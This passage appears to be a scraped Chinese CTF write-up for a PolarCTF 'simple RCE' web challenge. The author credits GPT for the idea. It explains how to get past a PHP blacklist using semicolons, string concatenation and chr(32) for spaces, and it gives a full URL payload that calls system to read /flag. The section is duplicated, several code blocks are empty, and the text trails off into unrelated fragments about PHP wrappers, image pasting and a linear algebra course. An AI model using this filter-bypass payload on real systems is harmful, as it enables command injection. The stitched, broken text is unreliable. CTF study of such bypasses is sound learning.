web部分
swp
简单RCE
从GPT身上学到一种php中命令执行绕过思路,
1 |
|
可以看到是黑名单过滤,通过;
可以执行多语句命令,通过变量赋值以及调用即可完成绕过,空格可以用chr(32)
代替,所有字符可以利用.
来进行来来连接。
1 | http://032c9277-dd21-4a2e-9cc6-c3e6158ba6c8.www.polarctf.com:8090/?sys=$a="s"."ystem";$b="ca"."t".chr(32)."/flag";$a($b); |
从GPT身上学到一种php中命令执行绕过思路,
1 | <?php |
可以看到是黑名单过滤,通过;
可以执行多语句命令,通过变量赋值以及调用即可完成绕过,空格可以用chr(32)
代替,所有字符可以利用.
来进行来来连接。
1 | http://032c9277-dd21-4a2e-9cc6-c3e6158ba6c8.www.polarctf.com:8090/?sys=$a="s"."ystem";$b="ca"."t".chr(32)."/flag";$a($b); |
1 | Linux: |
PHP 提供的文件打开方式不仅仅是简单的文件路径,而是通过文件流的方式进行操作。这些文件流可以被看作是一种特殊的协议,即 Wrapper 协议(PHP中有很多功能不同但形式相似的协议,统称为Wrapper)。
(为什么莫名其妙插入了一张图片?原因是我终于找到能粘贴图片并直接放在同名文件夹中的方法了,太兴奋了!!!)
参考文章:
在B站MIT的线代课评论区中,看到有人提到了此课程,于是带着好奇心去看了这门课。